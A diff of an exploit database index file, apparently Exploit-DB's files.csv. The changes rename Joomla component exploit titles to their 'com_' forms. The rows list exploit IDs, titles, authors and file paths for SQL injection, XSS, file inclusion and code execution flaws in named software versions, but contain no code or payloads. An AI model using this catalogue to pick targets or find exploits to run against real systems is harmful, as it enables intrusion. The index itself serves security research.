 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0
-34708,platforms/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0
+34708,platforms/php/webapps/34708.pl,"Joomla! Component 'com_tax' - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0
 34709,platforms/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
 34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Parameter Cross-Site Scripting",2009-08-21,"599eme Man",php,webapps,0
 34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php' cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0
@@ -31453,7 +31453,7 @@ id,file,description,date,author,platform,type,port
 34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0
 34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps,0
 34815,platforms/windows/remote/34815.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0
-34820,platforms/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
+34820,platforms/php/webapps/34820.pl,"Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0
 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446
 34975,platforms/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0
@@ -31465,11 +31465,11 @@ id,file,description,date,author,platform,type,port
 34830,platforms/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0
 34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0
 34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0
-34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0
+34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component 'com_trade' - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0
 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0
 34835,platforms/windows/remote/34835.py,"e2eSoft VCam - DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0
-34837,platforms/php/webapps/34837.txt,"Joomla! Component com_jstore - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
+34837,platforms/php/webapps/34837.txt,"Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator - 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote,0
 34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0
 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
@@ -31529,7 +31529,7 @@ id,file,description,date,author,platform,type,port
 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
-35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
+35024,platforms/php/webapps/35024.txt,"Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0
 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
@@ -31599,7 +31599,7 @@ id,file,description,date,author,platform,type,port
 34969,platforms/hardware/webapps/34969.html,"Tenda A32 Router - Cross-Site Request Forgery",2014-10-14,zixian,hardware,webapps,0
 34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0
 34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",asp,webapps,0
-34972,platforms/php/webapps/34972.txt,"Joomla! Component AutoArticles 3000 - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0
+34972,platforms/php/webapps/34972.txt,"Joomla! Component 'com_a3000' - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0
 34973,platforms/php/webapps/34973.txt,"WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0
 34974,platforms/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0
 34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation (Metasploit)",2014-10-15,Metasploit,win_x86,local,0
@@ -31639,7 +31639,7 @@ id,file,description,date,author,platform,type,port
 35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060)",2014-10-20,Metasploit,win_x86,local,0
 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0
-35026,platforms/php/webapps/35026.txt,"Joomla! Component Store Directory - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0
+35026,platforms/php/webapps/35026.txt,"Joomla! Component 'com_storedirectory' - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0
 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0
 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0
 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0
@@ -31647,7 +31647,7 @@ id,file,description,date,author,platform,type,port
 35033,platforms/php/remote/35033.rb,"Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution (Metasploit)",2014-10-21,Metasploit,php,remote,80
 35034,platforms/multiple/remote/35034.rb,"HP Data Protector - EXEC_INTEGUTIL Remote Code Execution (Metasploit)",2014-10-21,Metasploit,multiple,remote,5555
 35035,platforms/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0
-35036,platforms/php/webapps/35036.txt,"Joomla! Component Annuaire - 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
+35036,platforms/php/webapps/35036.txt,"Joomla! Component 'com_annuaire' - 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000
 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,ios,webapps,80
 35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
@@ -31705,15 +31705,15 @@ id,file,description,date,author,platform,type,port
 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
 35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0
-35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
-35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
+35089,platforms/php/webapps/35089.txt,"Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
+35090,platforms/php/webapps/35090.txt,"Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
 35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
 35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0
 35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
 35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
-35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
-35097,platforms/php/webapps/35097.txt,"Joomla! Component Redirect 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
+35096,platforms/php/webapps/35096.txt,"Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
+35097,platforms/php/webapps/35097.txt,"Joomla! Component 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
@@ -31751,7 +31751,7 @@ id,file,description,date,author,platform,type,port
 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0
 35133,platforms/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0
-35135,platforms/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
+35135,platforms/php/webapps/35135.txt,"Joomla! Component 'com_classified' - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
 35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0
 35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
 35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0
@@ -31817,7 +31817,7 @@ id,file,description,date,author,platform,type,port
 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
 35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
-35295,platforms/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
+35295,platforms/php/webapps/35295.txt,"Joomla! Component 'com_frontenduseraccess' - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0
 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0
@@ -31853,7 +31853,7 @@ id,file,description,date,author,platform,type,port
 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
 35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
-35293,platforms/php/webapps/35293.txt,"Joomla! Component VirtueMart eCommerce 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0
+35293,platforms/php/webapps/35293.txt,"Joomla! Component 'com_virtuemart' 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0
 35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
 35289,platforms/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0
 35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0
@@ -31887,7 +31887,7 @@ id,file,description,date,author,platform,type,port
 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
 35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0
 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
-35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
+35294,platforms/php/webapps/35294.txt,"Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
 35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution (Metasploit)",2014-11-18,Metasploit,android,remote,0
 35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection (Metasploit)",2014-11-18,Metasploit,php,remote,80
 35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
@@ -32196,7 +32196,7 @@ id,file,description,date,author,platform,type,port
 35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
 35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
 35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
-35630,platforms/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
+35630,platforms/php/webapps/35630.txt,"Joomla! Component 'com_phocadownload' - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
 35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0
 35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
 35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0
@@ -32297,7 +32297,7 @@ id,file,description,date,author,platform,type,port
 35742,platforms/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0
 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0
-35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
+35745,platforms/php/webapps/35745.txt,"Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
 35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - (Enable sudo) Privilege Escalation",2015-01-11,"prdelka & ‏sfan55",linux,local,0
 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0
 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - (World-writeable rc.sysinit) Privilege Escalation",2015-01-11,prdelka,linux,local,0
@@ -32339,7 +32339,7 @@ id,file,description,date,author,platform,type,port
 35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0
 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 - DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0
 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0
-35788,platforms/php/webapps/35788.txt,"Joomla! Component com_maplocator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
+35788,platforms/php/webapps/35788.txt,"Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
 35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x - Memory Corruption",2011-05-24,"Andy Davis",multiple,remote,0
 35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0
@@ -32349,7 +32349,7 @@ id,file,description,date,author,platform,type,port
 35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps,0
 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0
 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,php,webapps,0
-35797,platforms/php/webapps/35797.txt,"Joomla! Component com_shop - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0
+35797,platforms/php/webapps/35797.txt,"Joomla! Component 'com_shop' - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0
 35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0
 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 - Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0
 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0
@@ -32377,8 +32377,8 @@ id,file,description,date,author,platform,type,port
 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0
 35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
-35984,platforms/php/webapps/35984.txt,"Joomla! Component Virtual Money 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
-35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
+35984,platforms/php/webapps/35984.txt,"Joomla! Component 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
+35826,platforms/php/webapps/35826.txt,"Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
 35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0
@@ -32437,7 +32437,7 @@ id,file,description,date,author,platform,type,port
 35880,platforms/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0
 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0
 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0
-35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
+35883,platforms/php/webapps/35883.txt,"Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
 35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0
 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0
@@ -32480,14 +32480,14 @@ id,file,description,date,author,platform,type,port
 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-07-04,"Stefan Schurtz",php,webapps,0
 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0
-35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
+35922,platforms/php/webapps/35922.txt,"Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0
 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0
 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0
 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0
 35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0
 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0
-35929,platforms/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
+35929,platforms/php/webapps/35929.txt,"Joomla! Component 'com_voj' - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
 35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0
 35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0
 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0
@@ -32512,17 +32512,16 @@ id,file,description,date,author,platform,type,port
 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
-35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35956,platforms/php/webapps/35956.txt,"Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0
